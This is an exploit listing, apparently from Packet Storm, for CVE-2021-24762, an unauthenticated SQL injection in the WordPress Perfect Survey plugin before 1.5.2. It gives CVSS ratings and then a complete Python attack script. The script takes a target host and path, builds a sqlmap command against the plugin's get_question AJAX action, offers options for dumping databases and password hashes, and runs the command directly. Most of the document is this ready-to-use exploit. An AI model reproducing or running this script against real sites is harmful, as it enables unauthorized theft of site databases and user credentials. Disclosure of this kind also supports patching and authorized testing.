WordPress Perfect Survey 1.5.1 SQL Injection

2022-02-2100:00:00

Ron Jost

packetstormsecurity.com

181

9.8 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

7.5 High

CVSS2

Access Vector

NETWORK

Access Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P

JSON

`# Exploit Title: WordPress Plugin Perfect Survey - 1.5.1 - SQLi (Unauthenticated)  
# Date 18.02.2022  
# Exploit Author: Ron Jost (Hacker5preme)  
# Vendor Homepage: https://www.getperfectsurvey.com/  
# Software Link: https://web.archive.org/web/20210817031040/https://downloads.wordpress.org/plugin/perfect-survey.1.5.1.zip  
# Version: < 1.5.2  
# Tested on: Ubuntu 20.04  
# CVE: CVE-2021-24762  
# CWE: CWE-89  
# Documentation: https://github.com/Hacker5preme/Exploits/blob/main/Wordpress/CVE-2021-24762/README.md  
  
'''  
Description:  
The Perfect Survey WordPress plugin before 1.5.2 does not validate and escape the question_id GET parameter before  
using it in a SQL statement in the get_question AJAX action, allowing unauthenticated users to perform SQL injection.  
'''  
  
banner = '''  
  
___ _ _ ______ ____ ____ ____ ___ ____ _ _ _______ _____ ____   
_(___)_ (_) (_)(______) _(____) (____) _(____) (___) _(____)(_) (_)(_______)(_____) _(____)   
(_) (_)(_) (_)(_)__ ______(_) _(_)(_) (_)(_) _(_)(_)(_) ______(_) _(_)(_)__(_)_ _(_)(_)___ (_) _(_)   
(_) _ (_) (_)(____)(______) _(_) (_) (_) _(_) (_)(______) _(_) (________)_(_) (_____)_ _(_)   
(_)___(_) (_)_(_) (_)____ (_)___ (_)__(_) (_)___ (_) (_)___ (_) (_) (_)___(_)(_)___   
(___) (___) (______) (______) (____) (______) (_) (______) (_)(_) (_____)(______)   
  
  
[+] Perfect Survey - SQL Injection  
[@] Developed by Ron Jost (Hacker5preme)  
  
'''  
print(banner)  
  
import argparse  
from datetime import datetime  
import os  
  
# User-Input:  
my_parser = argparse.ArgumentParser(description= 'Perfect Survey - SQL-Injection (unauthenticated)')  
my_parser.add_argument('-T', '--IP', type=str)  
my_parser.add_argument('-P', '--PORT', type=str)  
my_parser.add_argument('-U', '--PATH', type=str)  
args = my_parser.parse_args()  
target_ip = args.IP  
target_port = args.PORT  
wp_path = args.PATH  
  
print('[*] Starting Exploit at: ' + str(datetime.now().strftime('%H:%M:%S')))  
print('[*] Payload for SQL-Injection:')  
exploitcode_url = r'sqlmap "http://' + target_ip + ':' + target_port + wp_path + r'wp-admin/admin-ajax.php?action=get_question&question_id=1 *" '  
print(' Sqlmap options:')  
print(' -a, --all Retrieve everything')  
print(' -b, --banner Retrieve DBMS banner')  
print(' --current-user Retrieve DBMS current user')  
print(' --current-db Retrieve DBMS current database')  
print(' --passwords Enumerate DBMS users password hashes')  
print(' --tables Enumerate DBMS database tables')  
print(' --columns Enumerate DBMS database table column')  
print(' --schema Enumerate DBMS schema')  
print(' --dump Dump DBMS database table entries')  
print(' --dump-all Dump all DBMS databases tables entries')  
retrieve_mode = input('Which sqlmap option should be used to retrieve your information? ')  
exploitcode = exploitcode_url + retrieve_mode + ' --answers="follow=Y" --batch -v 0'  
os.system(exploitcode)  
print('Exploit finished at: ' + str(datetime.now().strftime('%H:%M:%S')))  
  
  
  
`